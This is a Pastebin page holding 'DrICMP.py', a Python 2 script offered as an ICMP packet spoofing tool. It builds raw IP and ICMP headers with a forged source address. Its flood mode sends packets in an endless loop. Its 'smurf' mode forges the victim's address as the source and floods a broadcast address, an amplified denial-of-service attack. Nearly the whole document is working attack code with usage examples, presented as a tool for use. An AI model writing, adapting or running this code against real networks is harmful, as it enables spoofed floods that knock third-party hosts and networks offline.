API tools faq
paste
Advertisement
Guest User

DrICMP.py

a guest
Jul 16th, 2013
118
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 4.04 KB | None | 0 0
raw download clone embed print report
  1.  
  2. # some imports
  3. import socket, sys
  4. from struct import *
  5.  
  6. def checksum(msg):
  7.     s = 0
  8.     for i in range(0, len(msg), 2):
  9.         w = (ord(msg[i]) << 8) + (ord(msg[i+1]) )
  10.         s = s + w
  11.      
  12.     s = (s>>16) + (s & 0xffff);
  13.     s = ~s & 0xffff
  14.      
  15.     return s
  16.    
  17. def main():
  18.     #Arguments and switches:
  19.     argv = sys.argv
  20.    
  21.     #Help:
  22.     if ('-h' in argv or '-?' in argv or '-help' in argv):
  23.         print ("\n\n  ||  DrICMP by Ro0k.\n  ||  Ver 0.2 Released in 16.7.2013\n  ||  The cutest ICMP packets spoofing tool online!\n")
  24.         print ("\tUsage: DrICMP.py [options] destinationIP")
  25.         print ("\tSwitches available:")
  26.         print("\t  -s IPaddr: Spoof the source ip address to be IPaddr")
  27.         print("\t  -t type: ICMP type number (Defaults to 8, ping request)")
  28.         print("\t  -c code: ICMP code number (Defaults to 0)")
  29.         print("\t  -pl payload: The payload sent in the ICMP (Defaults to 0xf0ba7d0d)")
  30.         print("\t  -f: Flood (Flooding the target instead of sending one packet)")
  31.         print("\t  -smurf broadcastAddr: Smurf attack.")
  32.         print("\n\t  Examples of use: DrICMP.py -t 3 -c 11 213.57.23.19")
  33.         print("\t                   DrICMP.py -smurf 192.168.56.255 192.168.56.17")
  34.         print("\n  For more information, Check Wikipedia's entry on ICMP, or simply google.")
  35.         sys.exit()
  36.    
  37.     args = {'dest':argv[-1], 'src':None, 'type': 8, 'code': 0, 'payload': 0xf0ba7d0d, 'flood': False,
  38.         'broadcast':'192.168.255.255', 'smurf': False}
  39.     if ('-s' in argv): args['src'] = argv[argv.index('-s')+1]; #Changing the ICMP Type.
  40.     if ('-t' in argv): args['type'] = int(argv[argv.index('-t')+1]); #Changing the ICMP Type.
  41.     if ('-c' in argv): args['code'] = int(argv[argv.index('-c')+1]); #Changing the ICMP Code. (Defaults to Zero)
  42.     if ('-pl' in argv): args['payload'] = int(argv[argv.index('-pl')+1], 16); #Changing the ICMP payload. (Defaults to Zero)
  43.     if ('-f' in argv): args['flood'] = True #Sending Packets in infinite loop (ctrl-c to break) instead of just one.
  44.     if ('-smurf' in argv): args['smurf'] = True; args['broadcast'] = argv[argv.index('-smurf')+1];  #Smurf attck on the Dest.
  45.    
  46.     #create a raw socket
  47.     try:
  48.         s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
  49.     except socket.error , msg:
  50.         print 'Socket could not be created. Error Code : ' + str(msg[0]) + ' Message ' + msg[1]
  51.         sys.exit()
  52.        
  53.     s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
  54.    
  55.     packet = ''
  56.     #In case of smurfing:
  57.     if (args['smurf']):
  58.         source_ip = args['dest']
  59.         dest_ip = args['broadcast']
  60.         args['type'] = 8
  61.         args['code'] = 0
  62.         args['flood'] = True
  63.        
  64.     else:
  65.         if (args['src'] != None): source_ip = args['src'] #address spoofing
  66.         else: source_ip = socket.gethostbyname_ex(socket.gethostname())[2][0]
  67.         dest_ip = args['dest']
  68.        
  69.    
  70.     #making the header + combining them:
  71.     ipHeader = ipHead(source_ip, dest_ip)
  72.     icmpHeader = icmpHead(args)
  73.    
  74.     packet = ipHeader + icmpHeader
  75.    
  76.     s.sendto(packet, (dest_ip, 0))
  77.    
  78.     if (args['flood']):
  79.         while(True):
  80.             s.sendto(packet, (dest_ip, 0));
  81.    
  82. def ipHead(source_ip, dest_ip):
  83.     # ip header fields
  84.     ihl = 5
  85.     version = 4
  86.     tos = 0
  87.     tot_len = 20 + 20  # python seems to correctly fill the total length
  88.     id = 54321
  89.     frag_off = 0
  90.     ttl = 255
  91.     protocol = socket.IPPROTO_ICMP
  92.     check = 10  # python seems to correctly fill the checksum
  93.     saddr = socket.inet_aton ( source_ip )
  94.     daddr = socket.inet_aton ( dest_ip )
  95.  
  96.     ihl_version = (version << 4) + ihl
  97.  
  98.     # packing the header (! = Big endians for network)
  99.     ip_header = pack('!BBHHHBBH4s4s' , ihl_version, tos, tot_len, id, frag_off, ttl, protocol, check, saddr, daddr)
  100.    
  101.     return ip_header
  102.    
  103. def icmpHead(args):
  104.     #icmp header fields
  105.     type = args['type']
  106.     code = args['code']
  107.     check = 0
  108.     payload = args['payload']
  109.    
  110.     # packing the header (! = Big endians for network)
  111.     icmp_headerToCheck = pack('!BBHI', type, code, check, payload) #packing without checksum (check = 0)
  112.     check = checksum(icmp_headerToCheck) #calculating checksum
  113.     icmp_header = pack('!BBHI', type, code, check, payload) #packing with checksum
  114.    
  115.    
  116.     return icmp_header
  117.    
  118. if __name__ == "__main__":
  119.     main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!